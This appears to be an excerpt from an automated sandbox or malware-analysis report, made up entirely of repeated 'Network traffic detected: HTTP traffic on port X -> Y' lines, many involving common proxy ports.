                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 65032
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4006
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 5088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 17158
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 17464
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 16203
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 3060
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 8899
                Source: unknownNetwork traffic detected: HTTP traffic on port 65032 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 29057
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 8449
                Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 27020
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 50364 -> 46648
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 17464
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 2572
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 8118
                Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 9400
                Source: unknownNetwork traffic detected: HTTP traffic on port 50418 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50355 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 10599
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50276
                Source: unknownNetwork traffic detected: HTTP traffic on port 50367 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 17158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50518 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 6116
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50179
                Source: unknownNetwork traffic detected: HTTP traffic on port 50579 -> 3129
                Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 50433 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 9353
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 11546
                Source: unknownNetwork traffic detected: HTTP traffic on port 50542 -> 10006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 50263
                Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 50631 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50681 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 8089
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 17464
                Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50495 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50188
                Source: unknownNetwork traffic detected: HTTP traffic on port 50613 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50687 -> 56370
                Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 11320
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 9400 -> 50249
                Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50648 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50681
                Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50542
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 3155
                Source: unknownNetwork traffic detected: HTTP traffic on port 50703 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50631
                Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 63819
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9080 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50768 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50418
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 2572
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 16203
                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 59609
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50433
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 29057
                Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50823 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 27020
                Source: unknownNetwork traffic detected: HTTP traffic on port 50892 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50740
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50495
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 51612
                Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 40330
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50565 -> 9990
                Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 54066
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50773 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50967 -> 22500
                Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 17158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50518
                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 51499
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 63010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50902 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50826 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 8826
                Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50549
                Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 53777
                Source: unknownNetwork traffic detected: HTTP traffic on port 51019 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 11320
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50977 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51026 -> 10003
                Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 21861
                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 31745
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 30993
                Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51162 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 62874
                Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 8090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51044 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 51109 -> 37847
                Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 10824
                Source: unknownNetwork traffic detected: HTTP traffic on port 50891 -> 53778
                Source: unknownNetwork traffic detected: HTTP traffic on port 51136 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51041 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 30747
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 54467
                Source: unknownNetwork traffic detected: HTTP traffic on port 51118 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51117 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51019
                Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 8787
                Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 63819
                Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 55806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 41385
                Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 51026
                Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 59609
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50977
                Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51123 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 51299 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 11546
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 63010
                Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 61818
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 50886
                Source: unknownNetwork traffic detected: HTTP traffic on port 51240 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51148 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51077 -> 30670
                Source: unknownNetwork traffic detected: HTTP traffic on port 51277 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51312 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51247 -> 2324
                Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 61792
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 62310
                Source: unknownNetwork traffic detected: HTTP traffic on port 51353 -> 39272
                Source: unknownNetwork traffic detected: HTTP traffic on port 51238 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50285 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50437 -> 19693
                Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51367 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 12403
                Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 51387 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 15097
                Source: unknownNetwork traffic detected: HTTP traffic on port 51382 -> 9123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50946 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51388 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 50565
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50957
                Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 22653
                Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 11320
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50186
                Source: unknownNetwork traffic detected: HTTP traffic on port 51335 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50523 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 12334
                Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50935
                Source: unknownNetwork traffic detected: HTTP traffic on port 51386 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51370 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51076
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51076
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51348
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50984
                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 33551
                Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51240
                Source: unknownNetwork traffic detected: HTTP traffic on port 51505 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51451 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51517 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51515 -> 10003
                Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 51384
                Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 51382
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 51499
                Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51419 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 51473 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 55806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 59609
                Source: unknownNetwork traffic detected: HTTP traffic on port 51465 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 57001
                Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 9401
                Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 33383
                Source: unknownNetwork traffic detected: HTTP traffic on port 51544 -> 1337
                Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 8826
                Source: unknownNetwork traffic detected: HTTP traffic on port 51602 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 51148
                Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 2324
                Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 8787
                Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 63819
                Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51494 -> 3629
                Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51507 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 32210
                Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 10919
                Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51609 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 6004
                Source: unknownNetwork traffic detected: HTTP traffic on port 51601 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51603 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 51515
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 34409
                Source: unknownNetwork traffic detected: HTTP traffic on port 51056 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51579 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51541 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51581 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 29380
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50906
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51242
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49924
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 50846 -> 33899
                Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51370
                Source: unknownNetwork traffic detected: HTTP traffic on port 51650 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 27020
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 16203
                Source: unknownNetwork traffic detected: HTTP traffic on port 1337 -> 51544
                Source: unknownNetwork traffic detected: HTTP traffic on port 50891 -> 53778
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 51671 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 4154
                Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 50942 -> 29466
                Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 8089
                Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 48298
                Source: unknownNetwork traffic detected: HTTP traffic on port 51481 -> 10081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51558 -> 65533
                Source: unknownNetwork traffic detected: HTTP traffic on port 51767 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 61792
                Source: unknownNetwork traffic detected: HTTP traffic on port 51353 -> 39272
                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 15280
                Source: unknownNetwork traffic detected: HTTP traffic on port 51736 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51732 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51737 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51743 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 22942
                Source: unknownNetwork traffic detected: HTTP traffic on port 50744 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 51535 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 63010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 19925
                Source: unknownNetwork traffic detected: HTTP traffic on port 51672 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 51395
                Source: unknownNetwork traffic detected: HTTP traffic on port 51794 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51772 -> 35254
                Source: unknownNetwork traffic detected: HTTP traffic on port 51599 -> 3629
                Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 64731
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51581
                Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 47421
                Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 12217
                Source: unknownNetwork traffic detected: HTTP traffic on port 51779 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51661
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49935
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 51871 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51898 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51817 -> 13574
                Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 44827
                Source: unknownNetwork traffic detected: HTTP traffic on port 51923 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51852 -> 27718
                Source: unknownNetwork traffic detected: HTTP traffic on port 51826 -> 27029
                Source: unknownNetwork traffic detected: HTTP traffic on port 51766 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51831 -> 5279
                Source: unknownNetwork traffic detected: HTTP traffic on port 51865 -> 4145
